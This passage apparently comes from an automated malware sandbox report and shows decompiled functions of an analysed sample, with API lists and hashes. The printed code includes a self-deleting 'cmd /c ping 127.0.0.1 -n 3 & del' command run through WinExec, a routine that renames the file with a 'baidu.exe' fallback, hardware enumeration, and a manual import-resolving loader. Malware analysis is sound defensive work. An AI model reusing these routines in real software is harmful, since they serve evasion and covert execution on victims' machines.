                                                                                                                                                                    					L1:
                                                                                                                                                                    					_t22 = 0;
                                                                                                                                                                    				}
                                                                                                                                                                    				return _t22;
                                                                                                                                                                    			}




















                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$Process$Free$AllocCommandEnvironmentInitializeLineStringsVersion___crt__cinit__heap_term__ioinit__ioterm__mtterm__setargv__setenvp
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2870529951-0
                                                                                                                                                                    • Opcode ID: 6c4bbaa7a2ed88e341af398c15252e428cac03d6031402dac072d6ceb804dc07
                                                                                                                                                                    • Instruction ID: 130607f004240c79eb30421efa65504882722ed8364210b240487f0131cf44a3
                                                                                                                                                                    • Opcode Fuzzy Hash: 6c4bbaa7a2ed88e341af398c15252e428cac03d6031402dac072d6ceb804dc07
                                                                                                                                                                    • Instruction Fuzzy Hash: 05317F75A043919BF750EFB2888175A77E8EF48381F21C429E909DA356EB34EC418B61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E1001A260() {
                                                                                                                                                                    				char _v267;
                                                                                                                                                                    				char _v268;
                                                                                                                                                                    				char _v531;
                                                                                                                                                                    				char _v532;
                                                                                                                                                                    				int _t15;
                                                                                                                                                                    				void* _t20;
                                                                                                                                                                    
                                                                                                                                                                    				_v532 = 0;
                                                                                                                                                                    				E1000CF20(_t20,  &_v531, 0, 0x103);
                                                                                                                                                                    				_v268 = 0;
                                                                                                                                                                    				E1000CF20(_t20,  &_v267, 0, 0x103);
                                                                                                                                                                    				GetModuleFileNameA(0,  &_v532, 0x104);
                                                                                                                                                                    				E1000CC93(_t20,  &_v268, "cmd /c ping 127.0.0.1 -n 3 & del \"%s\"",  &_v532);
                                                                                                                                                                    				_t15 = WinExec( &_v268, 0); // executed
                                                                                                                                                                    				return _t15;
                                                                                                                                                                    			}










                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    • cmd /c ping 127.0.0.1 -n 3 & del "%s", xrefs: 1001A2BE
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _memset$ExecFileModuleName_sprintf
                                                                                                                                                                    • String ID: cmd /c ping 127.0.0.1 -n 3 & del "%s"
                                                                                                                                                                    • API String ID: 2874319085-10483710
                                                                                                                                                                    • Opcode ID: e80dcffb5be6524fb62fa3981304e452ddcdcc2dec408acc4a89c3725432b8f1
                                                                                                                                                                    • Instruction ID: 1002a94702f99074cc5a7191c0e86848812ee27a6531f1c6c96f6cd2bf050705
                                                                                                                                                                    • Opcode Fuzzy Hash: e80dcffb5be6524fb62fa3981304e452ddcdcc2dec408acc4a89c3725432b8f1
                                                                                                                                                                    • Instruction Fuzzy Hash: 6EF0AF7988431C6AE720D760DC8AFE9772CAB20700F0005D4F6986A0C1EAF067C88BA2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                                    			E1001A600(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                    				struct HINSTANCE__* _v8;
                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                    				char _v52;
                                                                                                                                                                    				char _v53;
                                                                                                                                                                    				short _v55;
                                                                                                                                                                    				char _v59;
                                                                                                                                                                    				char _v63;
                                                                                                                                                                    				char _v67;
                                                                                                                                                                    				char _v71;
                                                                                                                                                                    				char _v72;
                                                                                                                                                                    				char _v335;
                                                                                                                                                                    				char _v336;
                                                                                                                                                                    				signed int _v340;
                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                    				intOrPtr _t40;
                                                                                                                                                                    				void* _t45;
                                                                                                                                                                    				intOrPtr _t73;
                                                                                                                                                                    
                                                                                                                                                                    				_t80 = __eflags;
                                                                                                                                                                    				_t71 = __edi;
                                                                                                                                                                    				_push(0xffffffff);
                                                                                                                                                                    				_push(E10022A9E);
                                                                                                                                                                    				_push( *[fs:0x0]);
                                                                                                                                                                    				 *[fs:0x0] = _t73;
                                                                                                                                                                    				_v340 = 0;
                                                                                                                                                                    				E10001160( &_v52, __eflags, 0x10024ca1);
                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                    				_v336 = 0;
                                                                                                                                                                    				E1000CF20(__edi,  &_v335, 0, 0x103);
                                                                                                                                                                    				GetModuleFileNameA(0,  &_v336, 0x104);
                                                                                                                                                                    				_t40 = E1001A170( &_v336); // executed
                                                                                                                                                                    				_v24 = _t40;
                                                                                                                                                                    				_v72 = 0;
                                                                                                                                                                    				_v71 = 0;
                                                                                                                                                                    				_v67 = 0;
                                                                                                                                                                    				_v63 = 0;
                                                                                                                                                                    				_v59 = 0;
                                                                                                                                                                    				_v55 = 0;
                                                                                                                                                                    				_v53 = 0;
                                                                                                                                                                    				E1000CC93(_t71,  &_v72, "%d", _v24);
                                                                                                                                                                    				_v20 = E1001A480(__ebx,  &_v72, _t71, __esi, _t80,  &_v72);
                                                                                                                                                                    				_t81 = _v20;
                                                                                                                                                                    				if(_v20 != 0) {
                                                                                                                                                                    					E10001A90( &_v52, _t81, _v20);
                                                                                                                                                                    					E10001A90( &_v52, _t81, ".exe");
                                                                                                                                                                    					_push(_v20);
                                                                                                                                                                    					E1000CA30(__ebx, _t71, __esi, _t81);
                                                                                                                                                                    				}
                                                                                                                                                                    				_t45 = E10001200( &_v52);
                                                                                                                                                                    				_t82 = _t45;
                                                                                                                                                                    				if(_t45 == 0) {
                                                                                                                                                                    					E10001A90( &_v52, _t82, "baidu.exe");
                                                                                                                                                                    				}
                                                                                                                                                                    				E10001110(_a4, _t82,  &_v52);
                                                                                                                                                                    				_v340 = _v340 | 0x00000001;
                                                                                                                                                                    				_v8 = 0xffffffff;
                                                                                                                                                                    				E100011A0( &_v52);
                                                                                                                                                                    				 *[fs:0x0] = _v16;
                                                                                                                                                                    				return _a4;
                                                                                                                                                                    			}























                                                                                                                                                                    APIs
                                                                                                                                                                    • _memset.LIBCMT ref: 1001A651
                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A667
                                                                                                                                                                      • Part of subcall function 1001A170: FindFirstFileA.KERNEL32(1001A679,?), ref: 1001A18E
                                                                                                                                                                      • Part of subcall function 1001A170: FindClose.KERNEL32(000000FF), ref: 1001A1B6
                                                                                                                                                                    • _sprintf.LIBCMT ref: 1001A6A5
                                                                                                                                                                      • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4BB
                                                                                                                                                                      • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4CE
                                                                                                                                                                      • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4DA
                                                                                                                                                                      • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4FD
                                                                                                                                                                      • Part of subcall function 1001A480: _sprintf.LIBCMT ref: 1001A56C
                                                                                                                                                                      • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A5B6
                                                                                                                                                                      • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                                      • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                                      • Part of subcall function 1000CA30: RtlFreeHeap.NTDLL(00000000,?,103301C0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                                      • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301C0), ref: 1000CAA9
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _memset$FileFind_sprintf_strlen$CloseErrorFirstFreeHeapLastModuleName___sbh_find_block___sbh_free_block
                                                                                                                                                                    • String ID: .exe$baidu.exe
                                                                                                                                                                    • API String ID: 3164538923-2273953317
                                                                                                                                                                    • Opcode ID: eaae4fab46b1e4210e375406be424a6574653a2564e2719a11e71cc4c1965c93
                                                                                                                                                                    • Instruction ID: 0ef21a583f90a00b500e35e1eebf572a8ff7ffe47b4923fec59976459a260394
                                                                                                                                                                    • Opcode Fuzzy Hash: eaae4fab46b1e4210e375406be424a6574653a2564e2719a11e71cc4c1965c93
                                                                                                                                                                    • Instruction Fuzzy Hash: E73169B5C10258ABEB14DFA0ED82FEDB7B4FF09744F000169F50AA7281EB746A44CB91
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 33%
                                                                                                                                                                    			E10019960(void* __ebx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                    				char _v44;
                                                                                                                                                                    				char _v48;
                                                                                                                                                                    				char _v312;
                                                                                                                                                                    				char _v572;
                                                                                                                                                                    				char _v832;
                                                                                                                                                                    				char _v1092;
                                                                                                                                                                    				char _v1352;
                                                                                                                                                                    				char _v1368;
                                                                                                                                                                    				char _v1372;
                                                                                                                                                                    				intOrPtr _v1376;
                                                                                                                                                                    				intOrPtr _v1380;
                                                                                                                                                                    				signed int _v1384;
                                                                                                                                                                    				void* __edi;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                    				intOrPtr _t74;
                                                                                                                                                                    				intOrPtr _t80;
                                                                                                                                                                    				void* _t85;
                                                                                                                                                                    				void* _t88;
                                                                                                                                                                    				void* _t91;
                                                                                                                                                                    				void* _t94;
                                                                                                                                                                    				void* _t97;
                                                                                                                                                                    				void* _t116;
                                                                                                                                                                    				signed int _t150;
                                                                                                                                                                    				void* _t164;
                                                                                                                                                                    				void* _t168;
                                                                                                                                                                    				void* _t171;
                                                                                                                                                                    				void* _t174;
                                                                                                                                                                    				void* _t177;
                                                                                                                                                                    				void* _t180;
                                                                                                                                                                    				void* _t182;
                                                                                                                                                                    				void* _t183;
                                                                                                                                                                    				void* _t184;
                                                                                                                                                                    				void* _t185;
                                                                                                                                                                    				void* _t186;
                                                                                                                                                                    				intOrPtr _t187;
                                                                                                                                                                    				void* _t188;
                                                                                                                                                                    				void* _t189;
                                                                                                                                                                    				void* _t191;
                                                                                                                                                                    				void* _t193;
                                                                                                                                                                    				void* _t194;
                                                                                                                                                                    				void* _t196;
                                                                                                                                                                    				void* _t197;
                                                                                                                                                                    				void* _t199;
                                                                                                                                                                    				void* _t200;
                                                                                                                                                                    				void* _t202;
                                                                                                                                                                    				void* _t203;
                                                                                                                                                                    
                                                                                                                                                                    				_t116 = __ebx;
                                                                                                                                                                    				 *[fs:0x0] = _t187;
                                                                                                                                                                    				_t188 = _t187 - 0x558;
                                                                                                                                                                    				_v1384 = 0;
                                                                                                                                                                    				_t74 = E10003170( &_v1368, __eflags);
                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                    				_v1376 = 0;
                                                                                                                                                                    				_v48 = 0;
                                                                                                                                                                    				_v1372 = 0;
                                                                                                                                                                    				__imp__SetupDiGetClassDevsA(0, 0, 0, 6, _t164, _t180,  *[fs:0x0], E10022A8C, 0xffffffff); // executed
                                                                                                                                                                    				_v1380 = _t74;
                                                                                                                                                                    				if(_v1380 != 0xffffffff) {
                                                                                                                                                                    					E1000CF20(_t164,  &_v44, 0, 0x1c);
                                                                                                                                                                    					_t189 = _t188 + 0xc;
                                                                                                                                                                    					_v44 = 0x1c;
                                                                                                                                                                    					while(1) {
                                                                                                                                                                    						_t148 = _v1376;
                                                                                                                                                                    						_t80 = _v1380;
                                                                                                                                                                    						__imp__SetupDiEnumDeviceInfo(_t80, _v1376,  &_v44);
                                                                                                                                                                    						if(_t80 == 0) {
                                                                                                                                                                    							break;
                                                                                                                                                                    						}
                                                                                                                                                                    						E1000CF20(_t164,  &_v1352, 0, 0x514);
                                                                                                                                                                    						_push( &_v1372);
                                                                                                                                                                    						_push( &_v48);
                                                                                                                                                                    						_push(0);
                                                                                                                                                                    						_t191 = _t189 + 0xc - 0x1c;
                                                                                                                                                                    						_t182 =  &_v44;
                                                                                                                                                                    						memcpy(_t191, _t182, 7 << 2);
                                                                                                                                                                    						_t168 = _t182 + 0xe;
                                                                                                                                                                    						_push(_v1380); // executed
                                                                                                                                                                    						_t85 = E10019780(_t116, _t182); // executed
                                                                                                                                                                    						_t193 = _t191 + 0x38;
                                                                                                                                                                    						_t213 = _t85;
                                                                                                                                                                    						if(_t85 != 0) {
                                                                                                                                                                    							E1000D190(_t116, _t168, _t182,  &_v1352, _v48, _v1372);
                                                                                                                                                                    							_push(_v48);
                                                                                                                                                                    							E1000CA30(_t116, _t168, _t182, _t213);
                                                                                                                                                                    							_t193 = _t193 + 0x10;
                                                                                                                                                                    						}
                                                                                                                                                                    						_push( &_v1372);
                                                                                                                                                                    						_push( &_v48);
                                                                                                                                                                    						_push(7);
                                                                                                                                                                    						_t194 = _t193 - 0x1c;
                                                                                                                                                                    						_t183 =  &_v44;
                                                                                                                                                                    						memcpy(_t194, _t183, 7 << 2);
                                                                                                                                                                    						_t171 = _t183 + 0xe;
                                                                                                                                                                    						_push(_v1380); // executed
                                                                                                                                                                    						_t88 = E10019780(_t116, _t183); // executed
                                                                                                                                                                    						_t196 = _t194 + 0x38;
                                                                                                                                                                    						_t214 = _t88;
                                                                                                                                                                    						if(_t88 != 0) {
                                                                                                                                                                    							E1000D190(_t116, _t171, _t183,  &_v1092, _v48, _v1372);
                                                                                                                                                                    							_push(_v48);
                                                                                                                                                                    							E1000CA30(_t116, _t171, _t183, _t214);
                                                                                                                                                                    							_t196 = _t196 + 0x10;
                                                                                                                                                                    						}
                                                                                                                                                                    						_push( &_v1372);
                                                                                                                                                                    						_push( &_v48);
                                                                                                                                                                    						_push(0x16);
                                                                                                                                                                    						_t197 = _t196 - 0x1c;
                                                                                                                                                                    						_t184 =  &_v44;
                                                                                                                                                                    						memcpy(_t197, _t184, 7 << 2);
                                                                                                                                                                    						_t174 = _t184 + 0xe;
                                                                                                                                                                    						_push(_v1380); // executed
                                                                                                                                                                    						_t91 = E10019780(_t116, _t184); // executed
                                                                                                                                                                    						_t199 = _t197 + 0x38;
                                                                                                                                                                    						_t215 = _t91;
                                                                                                                                                                    						if(_t91 != 0) {
                                                                                                                                                                    							E1000D190(_t116, _t174, _t184,  &_v832, _v48, _v1372);
                                                                                                                                                                    							_push(_v48);
                                                                                                                                                                    							E1000CA30(_t116, _t174, _t184, _t215);
                                                                                                                                                                    							_t199 = _t199 + 0x10;
                                                                                                                                                                    						}
                                                                                                                                                                    						_push( &_v1372);
                                                                                                                                                                    						_push( &_v48);
                                                                                                                                                                    						_push(0xc);
                                                                                                                                                                    						_t200 = _t199 - 0x1c;
                                                                                                                                                                    						_t185 =  &_v44;
                                                                                                                                                                    						memcpy(_t200, _t185, 7 << 2);
                                                                                                                                                                    						_t177 = _t185 + 0xe;
                                                                                                                                                                    						_push(_v1380); // executed
                                                                                                                                                                    						_t94 = E10019780(_t116, _t185); // executed
                                                                                                                                                                    						_t202 = _t200 + 0x38;
                                                                                                                                                                    						_t216 = _t94;
                                                                                                                                                                    						if(_t94 != 0) {
                                                                                                                                                                    							E1000D190(_t116, _t177, _t185,  &_v572, _v48, _v1372);
                                                                                                                                                                    							_push(_v48);
                                                                                                                                                                    							E1000CA30(_t116, _t177, _t185, _t216);
                                                                                                                                                                    							_t202 = _t202 + 0x10;
                                                                                                                                                                    						}
                                                                                                                                                                    						_push( &_v1372);
                                                                                                                                                                    						_push( &_v48);
                                                                                                                                                                    						_push(8);
                                                                                                                                                                    						_t203 = _t202 - 0x1c;
                                                                                                                                                                    						_t186 =  &_v44;
                                                                                                                                                                    						memcpy(_t203, _t186, 7 << 2);
                                                                                                                                                                    						_t164 = _t186 + 0xe;
                                                                                                                                                                    						_push(_v1380); // executed
                                                                                                                                                                    						_t97 = E10019780(_t116, _t186); // executed
                                                                                                                                                                    						_t189 = _t203 + 0x38;
                                                                                                                                                                    						_t217 = _t97;
                                                                                                                                                                    						if(_t97 != 0) {
                                                                                                                                                                    							E1000D190(_t116, _t164, _t186,  &_v312, _v48, _v1372);
                                                                                                                                                                    							_push(_v48);
                                                                                                                                                                    							E1000CA30(_t116, _t164, _t186, _t217);
                                                                                                                                                                    							_t189 = _t189 + 0x10;
                                                                                                                                                                    						}
                                                                                                                                                                    						_v1376 = _v1376 + 1;
                                                                                                                                                                    						E10003310( &_v1368,  &_v1352, _t217,  &_v1352);
                                                                                                                                                                    					}
                                                                                                                                                                    					__imp__SetupDiDestroyDeviceInfoList(_v1380); // executed
                                                                                                                                                                    				}
                                                                                                                                                                    				E100031A0(_a4, _t148, __eflags,  &_v1368);
                                                                                                                                                                    				_t150 = _v1384 | 0x00000001;
                                                                                                                                                                    				__eflags = _t150;
                                                                                                                                                                    				_v1384 = _t150;
                                                                                                                                                                    				_v8 = 0xffffffff;
                                                                                                                                                                    				E10003280( &_v1368); // executed
                                                                                                                                                                    				 *[fs:0x0] = _v16;
                                                                                                                                                                    				return _a4;
                                                                                                                                                                    			}


                                                                                                                                                                    APIs
                                                                                                                                                                    • SetupDiGetClassDevsA.SETUPAPI(00000000,00000000,00000000,00000006), ref: 100199BF
                                                                                                                                                                    • _memset.LIBCMT ref: 100199E0
                                                                                                                                                                    • SetupDiEnumDeviceInfo.SETUPAPI(000000FF,00000000,0000001C), ref: 10019A01
                                                                                                                                                                    • _memset.LIBCMT ref: 10019A1D
                                                                                                                                                                      • Part of subcall function 10019780: SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,?,00000000,00000000,00000000,?), ref: 100197AC
                                                                                                                                                                      • Part of subcall function 10019780: GetLastError.KERNEL32 ref: 100197B2
                                                                                                                                                                      • Part of subcall function 10019780: _memset.LIBCMT ref: 100197DE
                                                                                                                                                                      • Part of subcall function 10019780: SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,00000000,00000000,?,?,00000000), ref: 10019804
                                                                                                                                                                      • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                                      • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                                      • Part of subcall function 1000CA30: RtlFreeHeap.NTDLL(00000000,?,103301C0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                                      • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301C0), ref: 1000CAA9
                                                                                                                                                                    • SetupDiDestroyDeviceInfoList.SETUPAPI(000000FF), ref: 10019BFB
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Setup$Device$_memset$ErrorInfoLastPropertyRegistry$ClassDestroyDevsEnumFreeHeapList___sbh_find_block___sbh_free_block
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3323326763-0
                                                                                                                                                                    • Opcode ID: 34e1c9ea5a169ca6ee0ccc6309070e38f518e9ff025555c95e667d819486c7d5
                                                                                                                                                                    • Instruction ID: 92146aaf36cf8da670849d236f9b8fe300c912f778ed1f5ba4bfc820bf5b102a
                                                                                                                                                                    • Opcode Fuzzy Hash: 34e1c9ea5a169ca6ee0ccc6309070e38f518e9ff025555c95e667d819486c7d5
                                                                                                                                                                    • Instruction Fuzzy Hash: 7381B676D006089BDB14DBA4DC51FEFB379EB48311F048198F509B7281EB35AA85CFA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 34%
                                                                                                                                                                    			E1001AB60(intOrPtr* _a4) {
                                                                                                                                                                    				void* _v8;
                                                                                                                                                                    				intOrPtr* _v12;
                                                                                                                                                                    				void* _v16;
                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                    				void* _v24;
                                                                                                                                                                    				void* _v28;
                                                                                                                                                                    				signed int* _v32;
                                                                                                                                                                    				void* _v36;
                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                    				void* _t108;
                                                                                                                                                                    				void* _t110;
                                                                                                                                                                    				void* _t113;
                                                                                                                                                                    				void* _t115;
                                                                                                                                                                    				void* _t122;
                                                                                                                                                                    				void* _t130;
                                                                                                                                                                    				void _t132;
                                                                                                                                                                    				void _t137;
                                                                                                                                                                    				void* _t144;
                                                                                                                                                                    				void* _t159;
                                                                                                                                                                    				void* _t194;
                                                                                                                                                                    				void* _t201;
                                                                                                                                                                    				void* _t202;
                                                                                                                                                                    				void* _t203;
                                                                                                                                                                    				void* _t204;
                                                                                                                                                                    
                                                                                                                                                                    				_t2 = _a4 + 4; // 0xe90575c0
                                                                                                                                                                    				_v20 =  *_t2;
                                                                                                                                                                    				_v16 = 1;
                                                                                                                                                                    				_v12 =  *_a4 + 0x80;
                                                                                                                                                                    				if( *((intOrPtr*)(_v12 + 4)) != 0) {
                                                                                                                                                                    					_v8 = _v20 +  *_v12;
                                                                                                                                                                    					while(1) {
                                                                                                                                                                    						_t108 = IsBadReadPtr(_v8, 0x14);
                                                                                                                                                                    						__eflags = _t108;
                                                                                                                                                                    						if(_t108 != 0) {
                                                                                                                                                                    							break;
                                                                                                                                                                    						}
                                                                                                                                                                    						_t110 = _v8;
                                                                                                                                                                    						__eflags =  *(_t110 + 0xc);
                                                                                                                                                                    						if( *(_t110 + 0xc) == 0) {
                                                                                                                                                                    							break;
                                                                                                                                                                    						}
                                                                                                                                                                    						_t18 = _a4 + 0x34; // 0x118bb84d
                                                                                                                                                                    						_t23 = _a4 + 0x24; // 0xf3c7e850, executed
                                                                                                                                                                    						_t113 =  *((intOrPtr*)( *_t23))(_v20 +  *((intOrPtr*)(_v8 + 0xc)),  *_t18); // executed
                                                                                                                                                                    						_t204 = _t203 + 8;
                                                                                                                                                                    						_v36 = _t113;
                                                                                                                                                                    						__eflags = _v36;
                                                                                                                                                                    						if(__eflags != 0) {
                                                                                                                                                                    							_t28 = _a4 + 0xc; // 0x52b8558b
                                                                                                                                                                    							_push(4 +  *_t28 * 4);
                                                                                                                                                                    							_t32 = _a4 + 8; // 0x98
                                                                                                                                                                    							_push( *_t32);
                                                                                                                                                                    							_t115 = E1000E018(_t144,  *_t32, _t201, _t202, __eflags);
                                                                                                                                                                    							_t203 = _t204 + 8;
                                                                                                                                                                    							_v28 = _t115;
                                                                                                                                                                    							__eflags = _v28;
                                                                                                                                                                    							if(_v28 != 0) {
                                                                                                                                                                    								 *(_a4 + 8) = _v28;
                                                                                                                                                                    								_t45 = _a4 + 0xc; // 0x52b8558b
                                                                                                                                                                    								_t47 = _a4 + 8; // 0x98
                                                                                                                                                                    								 *((intOrPtr*)( *_t47 +  *_t45 * 4)) = _v36;
                                                                                                                                                                    								_t52 = _a4 + 0xc; // 0x52b8558b
                                                                                                                                                                    								 *(_a4 + 0xc) =  *_t52 + 1;
                                                                                                                                                                    								__eflags =  *_v8;
                                                                                                                                                                    								if( *_v8 == 0) {
                                                                                                                                                                    									_v32 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
                                                                                                                                                                    									_t122 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
                                                                                                                                                                    									__eflags = _t122;
                                                                                                                                                                    									_v24 = _t122;
                                                                                                                                                                    								} else {
                                                                                                                                                                    									_v32 = _v20 +  *_v8;
                                                                                                                                                                    									_v24 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
                                                                                                                                                                    								}
                                                                                                                                                                    								while(1) {
                                                                                                                                                                    									__eflags =  *_v32;
                                                                                                                                                                    									if( *_v32 == 0) {
                                                                                                                                                                    										break;
                                                                                                                                                                    									}
                                                                                                                                                                    									__eflags =  *_v32 & 0x80000000;
                                                                                                                                                                    									if(( *_v32 & 0x80000000) == 0) {
                                                                                                                                                                    										_v40 = _v20 +  *_v32;
                                                                                                                                                                    										_t88 = _a4 + 0x34; // 0x118bb84d
                                                                                                                                                                    										_t130 = _v40 + 2;
                                                                                                                                                                    										__eflags = _t130;
                                                                                                                                                                    										_t92 = _a4 + 0x28; // 0xc483ffff
                                                                                                                                                                    										_t132 =  *((intOrPtr*)( *_t92))(_v36, _t130,  *_t88);
                                                                                                                                                                    										_t203 = _t203 + 0xc;
                                                                                                                                                                    										 *_v24 = _t132;
                                                                                                                                                                    									} else {
                                                                                                                                                                    										_t78 = _a4 + 0x34; // 0x118bb84d
                                                                                                                                                                    										_t82 = _a4 + 0x28; // 0xc483ffff
                                                                                                                                                                    										_t137 =  *((intOrPtr*)( *_t82))(_v36,  *_v32 & 0x0000ffff,  *_t78);
                                                                                                                                                                    										_t203 = _t203 + 0xc;
                                                                                                                                                                    										 *_v24 = _t137;
                                                                                                                                                                    									}
                                                                                                                                                                    									__eflags =  *_v24;
                                                                                                                                                                    									if( *_v24 != 0) {
                                                                                                                                                                    										_v32 =  &(_v32[1]);
                                                                                                                                                                    										_t194 = _v24 + 4;
                                                                                                                                                                    										__eflags = _t194;
                                                                                                                                                                    										_v24 = _t194;
                                                                                                                                                                    										continue;
                                                                                                                                                                    									} else {
                                                                                                                                                                    										_v16 = 0;
                                                                                                                                                                    										break;
                                                                                                                                                                    									}
                                                                                                                                                                    								}
                                                                                                                                                                    								__eflags = _v16;
                                                                                                                                                                    								if(_v16 != 0) {
                                                                                                                                                                    									_t159 = _v8 + 0x14;
                                                                                                                                                                    									__eflags = _t159;
                                                                                                                                                                    									_v8 = _t159;
                                                                                                                                                                    									continue;
                                                                                                                                                                    								}
                                                                                                                                                                    								_t98 = _a4 + 0x34; // 0x118bb84d
                                                                                                                                                                    								_t101 = _a4 + 0x2c; // 0x75c08504
                                                                                                                                                                    								 *((intOrPtr*)( *_t101))(_v36,  *_t98);
                                                                                                                                                                    								SetLastError(0x7f);
                                                                                                                                                                    								break;
                                                                                                                                                                    							}
                                                                                                                                                                    							_t36 = _a4 + 0x34; // 0x118bb84d
                                                                                                                                                                    							_t39 = _a4 + 0x2c; // 0x75c08504
                                                                                                                                                                    							 *((intOrPtr*)( *_t39))(_v36,  *_t36);
                                                                                                                                                                    							SetLastError(0xe);
                                                                                                                                                                    							_v16 = 0;
                                                                                                                                                                    							break;
                                                                                                                                                                    						}
                                                                                                                                                                    						SetLastError(0x7e);
                                                                                                                                                                    						_v16 = 0;
                                                                                                                                                                    						break;
                                                                                                                                                                    					}
                                                                                                                                                                    					return _v16;
                                                                                                                                                                    				}
                                                                                                                                                                    				return 1;
                                                                                                                                                                    			}

                                                                                                                                                                    APIs
                                                                                                                                                                    • IsBadReadPtr.KERNEL32(00000000,00000014), ref: 1001ABB2
                                                                                                                                                                    • SetLastError.KERNEL32(0000007E), ref: 1001ABF4
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
